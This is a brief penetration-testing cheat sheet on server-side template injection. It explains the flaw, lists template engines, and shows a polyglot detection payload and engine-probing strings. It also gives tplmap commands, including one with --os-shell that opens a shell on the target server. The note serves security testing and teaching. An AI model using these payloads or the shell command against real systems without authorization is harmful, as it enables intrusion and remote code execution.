SSTI

What is SSTI?

Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side. This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE).

Some of the most popular template engines can be listed as the followings:

• PHP – Smarty, Twigs

• Java – Velocity, Freemaker

• Python – JINJA, Mako, Tornado

• JavaScript – Jade, Rage

• Ruby – Liquid

How Does It Work?

For the sake of simplicity, imagine you're testing the parameter of the following request:

POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
parameter=value

To detect the vulnerability, use the polyglot payload as the value of the parameter which is a sequence of special characters such as the following:

POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
parameter=${{<%[%'"}}%\.

To identify the template engine, read the error message:

If the error message is not displaying the template engine, we can test via known syntaxes for the popular template engines:

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Exploit

Tools

Tplmap

python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade

Links :

PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

A Pentester’s Guide to Server Side Template Injection (SSTI) | Cobalt Blog

SSTI (Server Side Template Injection)HackTricks